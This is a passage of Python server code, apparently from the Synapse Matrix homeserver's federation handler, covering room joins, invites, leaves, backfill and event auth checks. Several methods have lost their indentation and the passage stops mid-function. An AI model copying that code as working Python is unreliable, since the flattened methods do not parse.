            The event ID of the join event, and the stream ID at which it was
            persisted.
        """
        # TODO: We should be able to call this on workers, but the upgrading of
        # room stuff after join currently doesn't work on workers.
        assert self.config.worker.worker_app is None

        logger.debug("Joining %s to %s", joinee, room_id)

        origin, event, room_version_obj = await self._make_and_verify_event(
            target_hosts,
            room_id,
            joinee,
            "join",
            content,
            params={"ver": KNOWN_ROOM_VERSIONS},
        )

        # This shouldn't happen, because the RoomMemberHandler has a
        # linearizer lock which only allows one operation per user per room
        # at a time - so this is just paranoia.
        assert room_id not in self.room_queues

        # Queue up any PDUs for this room that arrive while we are joining.
        self.room_queues[room_id] = []

        await self._clean_room_for_join(room_id)

        handled_events = set()

        try:
            # Try the host we successfully got a response to /make_join/
            # request first.
            host_list = list(target_hosts)
            try:
                host_list.remove(origin)
                host_list.insert(0, origin)
            except ValueError:
                pass

            ret = await self.federation_client.send_join(
                host_list, event, room_version_obj
            )

            origin = ret["origin"]
            state = ret["state"]
            auth_chain = ret["auth_chain"]
            auth_chain.sort(key=lambda e: e.depth)

            handled_events.update([s.event_id for s in state])
            handled_events.update([a.event_id for a in auth_chain])
            handled_events.add(event.event_id)

            logger.debug("do_invite_join auth_chain: %s", auth_chain)
            logger.debug("do_invite_join state: %s", state)

            logger.debug("do_invite_join event: %s", event)

            # if this is the first time we've joined this room, it's time to add
            # a row to `rooms` with the correct room version. If there's already a
            # row there, we should override it, since it may have been populated
            # based on an invite request which lied about the room version.
            #
            # federation_client.send_join has already checked that the room
            # version in the received create event is the same as room_version_obj,
            # so we can rely on it now.
            #
            await self.store.upsert_room_on_join(
                room_id=room_id, room_version=room_version_obj,
            )

            max_stream_id = await self._persist_auth_tree(
                origin, room_id, auth_chain, state, event, room_version_obj
            )

            # We wait here until this instance has seen the events come down
            # replication (if we're using replication) as the below uses caches.
            await self._replication.wait_for_stream_position(
                self.config.worker.events_shard_config.get_instance(room_id),
                "events",
                max_stream_id,
            )

            # Check whether this room is the result of an upgrade of a room we already know
            # about. If so, migrate over user information
            predecessor = await self.store.get_room_predecessor(room_id)
            if not predecessor or not isinstance(predecessor.get("room_id"), str):
                return event.event_id, max_stream_id

            old_room_id = predecessor["room_id"]
            logger.debug(
                "Found predecessor for %s during remote join: %s", room_id, old_room_id
            )

            # We retrieve the room member handler here as to not cause a cyclic dependency
            member_handler = self.hs.get_room_member_handler()
            await member_handler.transfer_room_state_on_room_upgrade(
                old_room_id, room_id
            )

            logger.debug("Finished joining %s to %s", joinee, room_id)
            return event.event_id, max_stream_id
        finally:
            room_queue = self.room_queues[room_id]
            del self.room_queues[room_id]

            # we don't need to wait for the queued events to be processed -
            # it's just a best-effort thing at this point. We do want to do
            # them roughly in order, though, otherwise we'll end up making
            # lots of requests for missing prev_events which we do actually
            # have. Hence we fire off the background task, but don't wait for it.
            run_in_background(self._handle_queued_pdus, room_queue)
async def _handle_queued_pdus(self, room_queue):
"""Process PDUs which got queued up while we were busy send_joining.
Args:
room_queue (list[FrozenEvent, str]): list of PDUs to be processed
and the servers that sent them
"""
for p, origin in room_queue:
try:
logger.info(
"Processing queued PDU %s which was received "
"while we were joining %s",
p.event_id,
p.room_id,
)
with nested_logging_context(p.event_id):
await self.on_receive_pdu(origin, p, sent_to_us_directly=True)
except Exception as e:
logger.warning(
"Error handling queued PDU %s from %s: %s", p.event_id, origin, e
)
    async def on_make_join_request(
        self, origin: str, room_id: str, user_id: str
    ) -> EventBase:
        """ We've received a /make_join/ request, so we create a partial
        join event for the room and return that. We do *not* persist or
        process it until the other server has signed it and sent it back.

        Args:
            origin: The (verified) server name of the requesting server.
            room_id: Room to create join event in
            user_id: The user to create the join for

        Returns:
            The partial, as-yet-unsigned join event.
        """
        if get_domain_from_id(user_id) != origin:
            logger.info(
                "Got /make_join request for user %r from different origin %s, ignoring",
                user_id,
                origin,
            )
            raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)

        # checking the room version will check that we've actually heard of the room
        # (and return a 404 otherwise)
        room_version = await self.store.get_room_version_id(room_id)

        # now check that we are *still* in the room
        is_in_room = await self.auth.check_host_in_room(room_id, self.server_name)
        if not is_in_room:
            logger.info(
                "Got /make_join request for room %s we are no longer in", room_id,
            )
            raise NotFoundError("Not an active room on this server")

        event_content = {"membership": Membership.JOIN}

        builder = self.event_builder_factory.new(
            room_version,
            {
                "type": EventTypes.Member,
                "content": event_content,
                "room_id": room_id,
                "sender": user_id,
                "state_key": user_id,
            },
        )

        try:
            event, context = await self.event_creation_handler.create_new_client_event(
                builder=builder
            )
        except SynapseError as e:
            logger.warning("Failed to create join to %s because %s", room_id, e)
            raise

        # The remote hasn't signed it yet, obviously. We'll do the full checks
        # when we get the event back in `on_send_join_request`
        await self.auth.check_from_context(
            room_version, event, context, do_sig_check=False
        )

        return event
async def on_send_join_request(self, origin, pdu):
""" We have received a join event for a room. Fully process it and
respond with the current state and auth chains.
"""
event = pdu
logger.debug(
"on_send_join_request from %s: Got event: %s, signatures: %s",
origin,
event.event_id,
event.signatures,
)
if get_domain_from_id(event.sender) != origin:
logger.info(
"Got /send_join request for user %r from different origin %s",
event.sender,
origin,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
event.internal_metadata.outlier = False
# Send this event on behalf of the origin server.
#
# The reasons we have the destination server rather than the origin
# server send it are slightly mysterious: the origin server should have
# all the necessary state once it gets the response to the send_join,
# so it could send the event itself if it wanted to. It may be that
# doing it this way reduces failure modes, or avoids certain attacks
# where a new server selectively tells a subset of the federation that
# it has joined.
#
# The fact is that, as of the current writing, Synapse doesn't send out
# the join event over federation after joining, and changing it now
# would introduce the danger of backwards-compatibility problems.
event.internal_metadata.send_on_behalf_of = origin
context = await self._handle_new_event(origin, event)
logger.debug(
"on_send_join_request: After _handle_new_event: %s, sigs: %s",
event.event_id,
event.signatures,
)
prev_state_ids = await context.get_prev_state_ids()
state_ids = list(prev_state_ids.values())
auth_chain = await self.store.get_auth_chain(state_ids)
state = await self.store.get_events(list(prev_state_ids.values()))
return {"state": list(state.values()), "auth_chain": auth_chain}
    async def on_invite_request(
        self, origin: str, event: EventBase, room_version: RoomVersion
    ):
        """ We've got an invite event. Process and persist it. Sign it.

        Respond with the now signed event.

        Args:
            origin: The (verified) server name of the server that sent the
                invite.
            event: The invite event.
            room_version: The version the remote claims the room has.

        Returns:
            The event, with our signature added.

        Raises:
            SynapseError: if any of the validity checks below fail.
        """
        # An invite is a state event keyed on the invited user.
        if event.state_key is None:
            raise SynapseError(400, "The invite event did not have a state key")
        is_blocked = await self.store.is_room_blocked(event.room_id)
        if is_blocked:
            raise SynapseError(403, "This room has been blocked on this server")
        # Honour the server-wide setting that disables incoming invites.
        if self.hs.config.block_non_admin_invites:
            raise SynapseError(403, "This server does not accept room invites")
        # Give the spam checker a chance to veto the invite.
        if not self.spam_checker.user_may_invite(
            event.sender, event.state_key, event.room_id
        ):
            raise SynapseError(
                403, "This user is not permitted to send invites to this server/user"
            )
        membership = event.content.get("membership")
        if event.type != EventTypes.Member or membership != Membership.INVITE:
            raise SynapseError(400, "The event was not an m.room.member invite event")
        # The sender must belong to the server that sent us the event, and
        # the invited user must be local to us.
        sender_domain = get_domain_from_id(event.sender)
        if sender_domain != origin:
            raise SynapseError(
                400, "The invite event was not from the server sending it"
            )
        if not self.is_mine_id(event.state_key):
            raise SynapseError(400, "The invite event must be for this server")
        # block any attempts to invite the server notices mxid
        if event.state_key == self._server_notices_mxid:
            raise SynapseError(HTTPStatus.FORBIDDEN, "Cannot invite this user")
        # keep a record of the room version, if we don't yet know it.
        # (this may get overwritten if we later get a different room version in a
        # join dance).
        await self._maybe_store_room_on_outlier_membership(
            room_id=event.room_id, room_version=room_version
        )
        # We have no state for the room, so the invite is stored as an
        # out-of-band outlier.
        event.internal_metadata.outlier = True
        event.internal_metadata.out_of_band_membership = True
        # Add our own signature before persisting and returning the event.
        event.signatures.update(
            compute_event_signature(
                room_version,
                event.get_pdu_json(),
                self.hs.hostname,
                self.hs.signing_key,
            )
        )
        context = await self.state_handler.compute_event_context(event)
        await self.persist_events_and_notify(event.room_id, [(event, context)])
        return event
async def do_remotely_reject_invite(
self, target_hosts: Iterable[str], room_id: str, user_id: str, content: JsonDict
) -> Tuple[EventBase, int]:
origin, event, room_version = await self._make_and_verify_event(
target_hosts, room_id, user_id, "leave", content=content
)
# Mark as outlier as we don't have any state for this event; we're not
# even in the room.
event.internal_metadata.outlier = True
event.internal_metadata.out_of_band_membership = True
# Try the host that we successfully called /make_leave/ on first for
# the /send_leave/ request.
host_list = list(target_hosts)
try:
host_list.remove(origin)
host_list.insert(0, origin)
except ValueError:
pass
await self.federation_client.send_leave(host_list, event)
context = await self.state_handler.compute_event_context(event)
stream_id = await self.persist_events_and_notify(
event.room_id, [(event, context)]
)
return event, stream_id
async def _make_and_verify_event(
self,
target_hosts: Iterable[str],
room_id: str,
user_id: str,
membership: str,
content: JsonDict = {},
params: Optional[Dict[str, Union[str, Iterable[str]]]] = None,
) -> Tuple[str, EventBase, RoomVersion]:
(
origin,
event,
room_version,
) = await self.federation_client.make_membership_event(
target_hosts, room_id, user_id, membership, content, params=params
)
logger.debug("Got response to make_%s: %s", membership, event)
# We should assert some things.
# FIXME: Do this in a nicer way
assert event.type == EventTypes.Member
assert event.user_id == user_id
assert event.state_key == user_id
assert event.room_id == room_id
return origin, event, room_version
    async def on_make_leave_request(
        self, origin: str, room_id: str, user_id: str
    ) -> EventBase:
        """ We've received a /make_leave/ request, so we create a partial
        leave event for the room and return that. We do *not* persist or
        process it until the other server has signed it and sent it back.

        Args:
            origin: The (verified) server name of the requesting server.
            room_id: Room to create leave event in
            user_id: The user to create the leave for

        Returns:
            The partial (unsigned) leave event.

        Raises:
            SynapseError: if the leaving user does not belong to ``origin``.
            AuthError: if the event fails the (non-signature) auth checks.
        """
        # A server may only request leaves on behalf of its own users.
        if get_domain_from_id(user_id) != origin:
            logger.info(
                "Got /make_leave request for user %r from different origin %s, ignoring",
                user_id,
                origin,
            )
            raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
        room_version = await self.store.get_room_version_id(room_id)
        builder = self.event_builder_factory.new(
            room_version,
            {
                "type": EventTypes.Member,
                "content": {"membership": Membership.LEAVE},
                "room_id": room_id,
                "sender": user_id,
                "state_key": user_id,
            },
        )
        event, context = await self.event_creation_handler.create_new_client_event(
            builder=builder
        )
        try:
            # The remote hasn't signed it yet, obviously. We'll do the full checks
            # when we get the event back in `on_send_leave_request`
            await self.auth.check_from_context(
                room_version, event, context, do_sig_check=False
            )
        except AuthError as e:
            logger.warning("Failed to create new leave %r because %s", event, e)
            raise e
        return event
    async def on_send_leave_request(self, origin, pdu):
        """ We have received a leave event for a room. Fully process it.

        Args:
            origin: the (verified) server the signed leave event came from.
            pdu: the signed leave event.

        Raises:
            SynapseError: if the event's sender does not belong to ``origin``.
        """
        event = pdu
        logger.debug(
            "on_send_leave_request: Got event: %s, signatures: %s",
            event.event_id,
            event.signatures,
        )
        # A server may only send leave events on behalf of its own users.
        if get_domain_from_id(event.sender) != origin:
            logger.info(
                "Got /send_leave request for user %r from different origin %s",
                event.sender,
                origin,
            )
            raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
        # This is no longer an outlier: process it fully.
        event.internal_metadata.outlier = False
        await self._handle_new_event(origin, event)
        logger.debug(
            "on_send_leave_request: After _handle_new_event: %s, sigs: %s",
            event.event_id,
            event.signatures,
        )
        return None
async def get_state_for_pdu(self, room_id: str, event_id: str) -> List[EventBase]:
"""Returns the state at the event. i.e. not including said event.
"""
event = await self.store.get_event(event_id, check_room_id=room_id)
state_groups = await self.state_store.get_state_groups(room_id, [event_id])
if state_groups:
_, state = list(state_groups.items()).pop()
results = {(e.type, e.state_key): e for e in state}
if event.is_state():
# Get previous state
if "replaces_state" in event.unsigned:
prev_id = event.unsigned["replaces_state"]
if prev_id != event.event_id:
prev_event = await self.store.get_event(prev_id)
results[(event.type, event.state_key)] = prev_event
else:
del results[(event.type, event.state_key)]
res = list(results.values())
return res
else:
return []
async def get_state_ids_for_pdu(self, room_id: str, event_id: str) -> List[str]:
"""Returns the state at the event. i.e. not including said event.
"""
event = await self.store.get_event(event_id, check_room_id=room_id)
state_groups = await self.state_store.get_state_groups_ids(room_id, [event_id])
if state_groups:
_, state = list(state_groups.items()).pop()
results = state
if event.is_state():
# Get previous state
if "replaces_state" in event.unsigned:
prev_id = event.unsigned["replaces_state"]
if prev_id != event.event_id:
results[(event.type, event.state_key)] = prev_id
else:
results.pop((event.type, event.state_key), None)
return list(results.values())
else:
return []
@log_function
async def on_backfill_request(
self, origin: str, room_id: str, pdu_list: List[str], limit: int
) -> List[EventBase]:
in_room = await self.auth.check_host_in_room(room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
# Synapse asks for 100 events per backfill request. Do not allow more.
limit = min(limit, 100)
events = await self.store.get_backfill_events(room_id, pdu_list, limit)
events = await filter_events_for_server(self.storage, origin, events)
return events
@log_function
async def get_persisted_pdu(
self, origin: str, event_id: str
) -> Optional[EventBase]:
"""Get an event from the database for the given server.
Args:
origin: hostname of server which is requesting the event; we
will check that the server is allowed to see it.
event_id: id of the event being requested
Returns:
None if we know nothing about the event; otherwise the (possibly-redacted) event.
Raises:
AuthError if the server is not currently in the room
"""
event = await self.store.get_event(
event_id, allow_none=True, allow_rejected=True
)
if event:
in_room = await self.auth.check_host_in_room(event.room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
events = await filter_events_for_server(self.storage, origin, [event])
event = events[0]
return event
else:
return None
async def get_min_depth_for_context(self, context):
return await self.store.get_min_depth(context)
    async def _handle_new_event(
        self, origin, event, state=None, auth_events=None, backfilled=False
    ):
        """Compute the context for, auth, and persist a single federated event.

        Args:
            origin: server we received the event from
            event: the event itself
            state: state at the event, if we don't have all its prev events
            auth_events: claimed auth events, if any
            backfilled: whether the event came from backfill

        Returns:
            The event context (with ``rejected`` set if auth failed).
        """
        context = await self._prep_event(
            origin, event, state=state, auth_events=auth_events, backfilled=backfilled
        )
        try:
            # Push actions only apply to live events: not outliers, not
            # backfilled history, and not rejected events.
            if (
                not event.internal_metadata.is_outlier()
                and not backfilled
                and not context.rejected
            ):
                await self.action_generator.handle_push_actions_for_event(
                    event, context
                )
            await self.persist_events_and_notify(
                event.room_id, [(event, context)], backfilled=backfilled
            )
        except Exception:
            # If anything above fails, clean up any staged push actions in
            # the background, then re-raise the original error.
            run_in_background(
                self.store.remove_push_actions_from_staging, event.event_id
            )
            raise
        return context
    async def _handle_new_events(
        self,
        origin: str,
        room_id: str,
        event_infos: Iterable[_NewEventInfo],
        backfilled: bool = False,
    ) -> None:
        """Creates the appropriate contexts and persists events. The events
        should not depend on one another, e.g. this should be used to persist
        a bunch of outliers, but not a chunk of individual events that depend
        on each other for state calculations.

        Notifies about the events where appropriate.

        Args:
            origin: server the events came from
            room_id: room the events belong to
            event_infos: the events, together with any state / claimed auth
                events needed to process them
            backfilled: whether the events came from backfill
        """

        async def prep(ev_info: _NewEventInfo):
            # Compute the context for a single event, inside a nested logging
            # context so log lines are attributable to the event.
            event = ev_info.event
            with nested_logging_context(suffix=event.event_id):
                res = await self._prep_event(
                    origin,
                    event,
                    state=ev_info.state,
                    auth_events=ev_info.auth_events,
                    backfilled=backfilled,
                )
            return res

        # Prepare all the events concurrently, then persist them as a batch.
        contexts = await make_deferred_yieldable(
            defer.gatherResults(
                [run_in_background(prep, ev_info) for ev_info in event_infos],
                consumeErrors=True,
            )
        )
        await self.persist_events_and_notify(
            room_id,
            [
                (ev_info.event, context)
                for ev_info, context in zip(event_infos, contexts)
            ],
            backfilled=backfilled,
        )
    async def _persist_auth_tree(
        self,
        origin: str,
        room_id: str,
        auth_events: List[EventBase],
        state: List[EventBase],
        event: EventBase,
        room_version: RoomVersion,
    ) -> int:
        """Checks the auth chain is valid (and passes auth checks) for the
        state and event. Then persists the auth chain and state atomically.
        Persists the event separately. Notifies about the persisted events
        where appropriate.

        Will attempt to fetch missing auth events.

        Args:
            origin: Where the events came from
            room_id: the room the events belong to
            auth_events: the auth chain for ``event``
            state: the state at ``event``
            event: the event itself
            room_version: The room version we expect this room to have, and
                will raise if it doesn't match the version in the create event.

        Returns:
            The stream ID after persisting ``event``.
        """
        # The auth chain and state events carry no state of their own, so
        # they are all stored as outliers.
        events_to_context = {}
        for e in itertools.chain(auth_events, state):
            e.internal_metadata.outlier = True
            ctx = await self.state_handler.compute_event_context(e)
            events_to_context[e.event_id] = ctx
        event_map = {
            e.event_id: e for e in itertools.chain(auth_events, state, [event])
        }
        create_event = None
        for e in auth_events:
            if (e.type, e.state_key) == (EventTypes.Create, ""):
                create_event = e
                break
        if create_event is None:
            # If the state doesn't have a create event then the room is
            # invalid, and it would fail auth checks anyway.
            raise SynapseError(400, "No create event in state")
        # Cross-check the expected room version against the create event.
        room_version_id = create_event.content.get(
            "room_version", RoomVersions.V1.identifier
        )
        if room_version.identifier != room_version_id:
            raise SynapseError(400, "Room version mismatch")
        # Collect any auth events that are referenced but were not supplied,
        # and try to fetch them from the origin server.
        missing_auth_events = set()
        for e in itertools.chain(auth_events, state, [event]):
            for e_id in e.auth_event_ids():
                if e_id not in event_map:
                    missing_auth_events.add(e_id)
        for e_id in missing_auth_events:
            m_ev = await self.federation_client.get_pdu(
                [origin], e_id, room_version=room_version, outlier=True, timeout=10000,
            )
            if m_ev and m_ev.event_id == e_id:
                event_map[e_id] = m_ev
            else:
                logger.info("Failed to find auth event %r", e_id)
        # Auth-check every event against its claimed auth events; events that
        # fail (other than `event` itself) are marked rejected but still
        # persisted below.
        for e in itertools.chain(auth_events, state, [event]):
            auth_for_e = {
                (event_map[e_id].type, event_map[e_id].state_key): event_map[e_id]
                for e_id in e.auth_event_ids()
                if e_id in event_map
            }
            if create_event:
                auth_for_e[(EventTypes.Create, "")] = create_event
            try:
                event_auth.check(room_version, e, auth_events=auth_for_e)
            except SynapseError as err:
                # we may get SynapseErrors here as well as AuthErrors. For
                # instance, there are a couple of (ancient) events in some
                # rooms whose senders do not have the correct sigil; these
                # cause SynapseErrors in auth.check. We don't want to give up
                # the attempt to federate altogether in such cases.
                logger.warning("Rejecting %s because %s", e.event_id, err.msg)
                if e == event:
                    raise
                events_to_context[e.event_id].rejected = RejectedReason.AUTH_ERROR
        await self.persist_events_and_notify(
            room_id,
            [
                (e, events_to_context[e.event_id])
                for e in itertools.chain(auth_events, state)
            ],
        )
        new_event_context = await self.state_handler.compute_event_context(
            event, old_state=state
        )
        return await self.persist_events_and_notify(
            room_id, [(event, new_event_context)]
        )
    async def _prep_event(
        self,
        origin: str,
        event: EventBase,
        state: Optional[Iterable[EventBase]],
        auth_events: Optional[MutableStateMap[EventBase]],
        backfilled: bool,
    ) -> EventContext:
        """Compute the event context and run auth checks for a federated event.

        Args:
            origin: server the event came from
            event: the event itself
            state: state at the event, if we don't have all its prev events
            auth_events: claimed auth events; if not given, they are computed
                from the state at the event
            backfilled: whether the event came from backfill

        Returns:
            The event context, with ``rejected`` set if auth failed.
        """
        context = await self.state_handler.compute_event_context(event, old_state=state)
        # If no claimed auth events were supplied, compute them from the
        # state at the event's position in the DAG.
        if not auth_events:
            prev_state_ids = await context.get_prev_state_ids()
            auth_events_ids = self.auth.compute_auth_events(
                event, prev_state_ids, for_verification=True
            )
            auth_events_x = await self.store.get_events(auth_events_ids)
            auth_events = {(e.type, e.state_key): e for e in auth_events_x.values()}
        # This is a hack to fix some old rooms where the initial join event
        # didn't reference the create event in its auth events.
        if event.type == EventTypes.Member and not event.auth_event_ids():
            if len(event.prev_event_ids()) == 1 and event.depth < 5:
                c = await self.store.get_event(
                    event.prev_event_ids()[0], allow_none=True
                )
                if c and c.type == EventTypes.Create:
                    auth_events[(c.type, c.state_key)] = c
        context = await self.do_auth(origin, event, context, auth_events=auth_events)
        # Accepted events get a soft-fail check against the *current* state.
        if not context.rejected:
            await self._check_for_soft_fail(event, state, backfilled)
        if event.type == EventTypes.GuestAccess and not context.rejected:
            await self.maybe_kick_guest_users(event)
        return context
    async def _check_for_soft_fail(
        self, event: EventBase, state: Optional[Iterable[EventBase]], backfilled: bool
    ) -> None:
        """Checks if we should soft fail the event; if so, marks the event as
        such (by setting ``internal_metadata.soft_failed``).

        Args:
            event: the event to check
            state: The state at the event if we don't have all the event's prev events
            backfilled: Whether the event is from backfill
        """
        # For new (non-backfilled and non-outlier) events we check if the event
        # passes auth based on the current state. If it doesn't then we
        # "soft-fail" the event.
        if backfilled or event.internal_metadata.is_outlier():
            return
        extrem_ids_list = await self.store.get_latest_event_ids_in_room(event.room_id)
        extrem_ids = set(extrem_ids_list)
        prev_event_ids = set(event.prev_event_ids())
        if extrem_ids == prev_event_ids:
            # If they're the same then the current state is the same as the
            # state at the event, so no point rechecking auth for soft fail.
            return
        room_version = await self.store.get_room_version_id(event.room_id)
        room_version_obj = KNOWN_ROOM_VERSIONS[room_version]
        # Calculate the "current state".
        if state is not None:
            # If we're explicitly given the state then we won't have all the
            # prev events, and so we have a gap in the graph. In this case
            # we want to be a little careful as we might have been down for
            # a while and have an incorrect view of the current state,
            # however we still want to do checks as gaps are easy to
            # maliciously manufacture.
            #
            # So we use a "current state" that is actually a state
            # resolution across the current forward extremities and the
            # given state at the event. This should correctly handle cases
            # like bans, especially with state res v2.
            state_sets_d = await self.state_store.get_state_groups(
                event.room_id, extrem_ids
            )
            state_sets = list(state_sets_d.values())  # type: List[Iterable[EventBase]]
            state_sets.append(state)
            current_states = await self.state_handler.resolve_events(
                room_version, state_sets, event
            )
            current_state_ids = {
                k: e.event_id for k, e in current_states.items()
            }  # type: StateMap[str]
        else:
            current_state_ids = await self.state_handler.get_current_state_ids(
                event.room_id, latest_event_ids=extrem_ids
            )
        logger.debug(
            "Doing soft-fail check for %s: state %s", event.event_id, current_state_ids,
        )
        # Now check if event pass auth against said current state
        auth_types = auth_types_for_event(event)
        current_state_ids_list = [
            e for k, e in current_state_ids.items() if k in auth_types
        ]
        auth_events_map = await self.store.get_events(current_state_ids_list)
        current_auth_events = {
            (e.type, e.state_key): e for e in auth_events_map.values()
        }
        try:
            event_auth.check(room_version_obj, event, auth_events=current_auth_events)
        except AuthError as e:
            logger.warning("Soft-failing %r because %s", event, e)
            # The flag is only set here; how soft-failed events are treated
            # downstream is handled elsewhere.
            event.internal_metadata.soft_failed = True
    async def on_query_auth(
        self, origin, event_id, room_id, remote_auth_chain, rejects, missing
    ):
        """Handle a query_auth request from a remote server.

        Processes the remote's auth chain for the event and responds with the
        difference between their auth chain and ours.

        Args:
            origin: the (verified) requesting server
            event_id: the event whose auth is being queried
            room_id: the room the event belongs to
            remote_auth_chain: the auth chain as the remote sees it
            rejects: not used by this implementation
            missing: not used by this implementation

        Returns:
            dict describing the auth difference, as produced by
            ``construct_auth_difference``.

        Raises:
            AuthError: if ``origin`` is not in the room.
        """
        in_room = await self.auth.check_host_in_room(room_id, origin)
        if not in_room:
            raise AuthError(403, "Host not in room.")
        event = await self.store.get_event(event_id, check_room_id=room_id)
        # Just go through and process each event in `remote_auth_chain`. We
        # don't want to fall into the trap of `missing` being wrong.
        for e in remote_auth_chain:
            try:
                await self._handle_new_event(origin, e)
            except AuthError:
                pass
        # Now get the current auth_chain for the event.
        local_auth_chain = await self.store.get_auth_chain(
            list(event.auth_event_ids()), include_given=True
        )
        # TODO: Check if we would now reject event_id. If so we need to tell
        # everyone.
        ret = await self.construct_auth_difference(local_auth_chain, remote_auth_chain)
        logger.debug("on_query_auth returning: %s", ret)
        return ret
async def on_get_missing_events(
self, origin, room_id, earliest_events, latest_events, limit
):
in_room = await self.auth.check_host_in_room(room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
# Only allow up to 20 events to be retrieved per request.
limit = min(limit, 20)
missing_events = await self.store.get_missing_events(
room_id=room_id,
earliest_events=earliest_events,
latest_events=latest_events,
limit=limit,
)
missing_events = await filter_events_for_server(
self.storage, origin, missing_events
)
return missing_events
    async def do_auth(
        self,
        origin: str,
        event: EventBase,
        context: EventContext,
        auth_events: MutableStateMap[EventBase],
    ) -> EventContext:
        """Run auth checks for an event, marking the context rejected on failure.

        Args:
            origin: the server the event came from
            event: the event to auth
            context: the event's context
            auth_events:
                Map from (event_type, state_key) to event

                Normally, our calculated auth_events based on the state of the room
                at the event's position in the DAG, though occasionally (eg if the
                event is an outlier), may be the auth events claimed by the remote
                server.

                Also NB that this function adds entries to it.

        Returns:
            updated context object
        """
        room_version = await self.store.get_room_version_id(event.room_id)
        room_version_obj = KNOWN_ROOM_VERSIONS[room_version]
        # First try to reconcile our auth events with the remote's; this is
        # best-effort and must not block processing of the event.
        try:
            context = await self._update_auth_events_and_context_for_auth(
                origin, event, context, auth_events
            )
        except Exception:
            # We don't really mind if the above fails, so lets not fail
            # processing if it does. However, it really shouldn't fail so
            # let's still log as an exception since we'll still want to fix
            # any bugs.
            logger.exception(
                "Failed to double check auth events for %s with remote. "
                "Ignoring failure and continuing processing of event.",
                event.event_id,
            )
        try:
            event_auth.check(room_version_obj, event, auth_events=auth_events)
        except AuthError as e:
            logger.warning("Failed auth resolution for %r because %s", event, e)
            context.rejected = RejectedReason.AUTH_ERROR
        return context
    async def _update_auth_events_and_context_for_auth(
        self,
        origin: str,
        event: EventBase,
        context: EventContext,
        auth_events: MutableStateMap[EventBase],
    ) -> EventContext:
        """Helper for do_auth. See there for docs.

        Checks whether a given event has the expected auth events. If it
        doesn't then we talk to the remote server to compare state to see if
        we can come to a consensus (e.g. if one server missed some valid
        state).

        This attempts to resolve any potential divergence of state between
        servers, but is not essential and so failures should not block further
        processing of the event.

        Args:
            origin: the server the event came from
            event: the event being authed
            context: the event's context
            auth_events:
                Map from (event_type, state_key) to event

                Normally, our calculated auth_events based on the state of the room
                at the event's position in the DAG, though occasionally (eg if the
                event is an outlier), may be the auth events claimed by the remote
                server.

                Also NB that this function adds entries to it.

        Returns:
            updated context
        """
        event_auth_events = set(event.auth_event_ids())
        # missing_auth is the set of the event's auth_events which we don't yet have
        # in auth_events.
        missing_auth = event_auth_events.difference(
            e.event_id for e in auth_events.values()
        )
        # if we have missing events, we need to fetch those events from somewhere.
        #
        # we start by checking if they are in the store, and then try calling /event_auth/.
        if missing_auth:
            have_events = await self.store.have_seen_events(missing_auth)
            logger.debug("Events %s are in the store", have_events)
            missing_auth.difference_update(have_events)
        if missing_auth:
            # If we don't have all the auth events, we need to get them.
            logger.info("auth_events contains unknown events: %s", missing_auth)
            try:
                try:
                    remote_auth_chain = await self.federation_client.get_event_auth(
                        origin, event.room_id, event.event_id
                    )
                except RequestSendFailed as e1:
                    # The other side isn't around or doesn't implement the
                    # endpoint, so lets just bail out.
                    logger.info("Failed to get event auth from remote: %s", e1)
                    return context
                seen_remotes = await self.store.have_seen_events(
                    [e.event_id for e in remote_auth_chain]
                )
                # Process each previously-unseen event in the remote's chain,
                # using only events from that chain as its auth events.
                for e in remote_auth_chain:
                    if e.event_id in seen_remotes:
                        continue
                    if e.event_id == event.event_id:
                        continue
                    try:
                        auth_ids = e.auth_event_ids()
                        auth = {
                            (e.type, e.state_key): e
                            for e in remote_auth_chain
                            if e.event_id in auth_ids or e.type == EventTypes.Create
                        }
                        e.internal_metadata.outlier = True
                        logger.debug(
                            "do_auth %s missing_auth: %s", event.event_id, e.event_id
                        )
                        await self._handle_new_event(origin, e, auth_events=auth)
                        if e.event_id in event_auth_events:
                            auth_events[(e.type, e.state_key)] = e
                    except AuthError:
                        pass
            except Exception:
                logger.exception("Failed to get auth chain")
        if event.internal_metadata.is_outlier():
            # XXX: given that, for an outlier, we'll be working with the
            # event's *claimed* auth events rather than those we calculated:
            # (a) is there any point in this test, since different_auth below will
            # obviously be empty
            # (b) alternatively, why don't we do it earlier?
            logger.info("Skipping auth_event fetch for outlier")
            return context
        different_auth = event_auth_events.difference(
            e.event_id for e in auth_events.values()
        )
        if not different_auth:
            return context
        logger.info(
            "auth_events refers to events which are not in our calculated auth "
            "chain: %s",
            different_auth,
        )
        # XXX: currently this checks for redactions but I'm not convinced that is
        # necessary?
        different_events = await self.store.get_events_as_list(different_auth)
        for d in different_events:
            if d.room_id != event.room_id:
                logger.warning(
                    "Event %s refers to auth_event %s which is in a different room",
                    event.event_id,
                    d.event_id,
                )
                # don't attempt to resolve the claimed auth events against our own
                # in this case: just use our own auth events.
                #
                # XXX: should we reject the event in this case? It feels like we should,
                # but then shouldn't we also do so if we've failed to fetch any of the
                # auth events?
                return context
        # now we state-resolve between our own idea of the auth events, and the remote's
        # idea of them.
        local_state = auth_events.values()
        remote_auth_events = dict(auth_events)
        remote_auth_events.update({(d.type, d.state_key): d for d in different_events})
        remote_state = remote_auth_events.values()
        room_version = await self.store.get_room_version_id(event.room_id)
        new_state = await self.state_handler.resolve_events(
            room_version, (local_state, remote_state), event
        )
        logger.info(
            "After state res: updating auth_events with new state %s",
            {
                (d.type, d.state_key): d.event_id
                for d in new_state.values()
                if auth_events.get((d.type, d.state_key)) != d
            },
        )
        auth_events.update(new_state)
        context = await self._update_context_for_auth_events(
            event, context, auth_events
        )
        return context
    async def _update_context_for_auth_events(
        self, event: EventBase, context: EventContext, auth_events: StateMap[EventBase]
    ) -> EventContext:
        """Update the state_ids in an event context after auth event resolution,
        storing the changes as a new state group.

        Args:
            event: The event we're handling the context for
            context: initial event context
            auth_events: Events to update in the event context.

        Returns:
            new event context
        """
        # exclude the state key of the new event from the current_state in the context.
        if event.is_state():
            event_key = (event.type, event.state_key)  # type: Optional[Tuple[str, str]]
        else:
            event_key = None
        state_updates = {
            k: a.event_id for k, a in auth_events.items() if k != event_key
        }
        # Copy before mutating — the context's maps may be shared elsewhere.
        current_state_ids = await context.get_current_state_ids()
